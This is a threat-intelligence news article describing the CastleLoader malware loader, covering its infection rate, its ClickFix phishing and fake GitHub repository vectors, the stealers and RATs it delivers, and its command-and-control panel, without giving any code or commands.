CastleLoader, a sophisticated malware loader that emerged in early 2025, has successfully compromised 469 devices out of 1,634 infection attempts since May 2025, achieving an alarming 28.7% infection rate.
This versatile threat has primarily targeted U.S. government entities through advanced phishing campaigns that exploit user trust in legitimate platforms and services.
The malware employs two primary infection vectors to deceive victims into executing malicious code.
The first method utilizes ClickFix phishing techniques themed around Cloudflare services, where attackers create fraudulent domains that mimic trusted platforms such as software development libraries, Google Meet, or browser update notifications.
These deceptive pages display fabricated error messages or CAPTCHA prompts, manipulating users into copying and executing malicious PowerShell commands through the Windows Run prompt.
PolySwarm analysts identified CastleLoader’s secondary infection method, which leverages fake GitHub repositories disguised as legitimate software tools.
One notable example includes a repository masquerading as SQL Server Management Studio (SSMS-lib), exploiting developers’ inherent trust in the GitHub platform to distribute malicious installers that establish connections to command-and-control servers.
The malware demonstrates remarkable versatility in its payload delivery capabilities, deploying various secondary threats including StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, and HijackLoader.
These payloads serve different malicious purposes, from credential harvesting and cryptocurrency wallet theft to establishing persistent backdoor access for continued system control.
Technical Architecture and C2 Infrastructure
CastleLoader’s technical sophistication becomes evident through its multi-stage execution process utilizing PowerShell and AutoIT scripts.
Following initial compromise, the AutoIT component loads shellcode directly into system memory as a Dynamic Link Library (DLL), subsequently resolving hashed DLL names and API calls to establish communication with one of seven distinct command-and-control servers.
The malware operators manage their infrastructure through a comprehensive web-based control panel that provides detailed victim telemetry, including unique identifiers, IP addresses, and comprehensive system information.
This panel features specialized modules for payload management and precise distribution control, supporting geographic targeting capabilities and encrypted Docker containers to enhance operational security and evade detection mechanisms.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
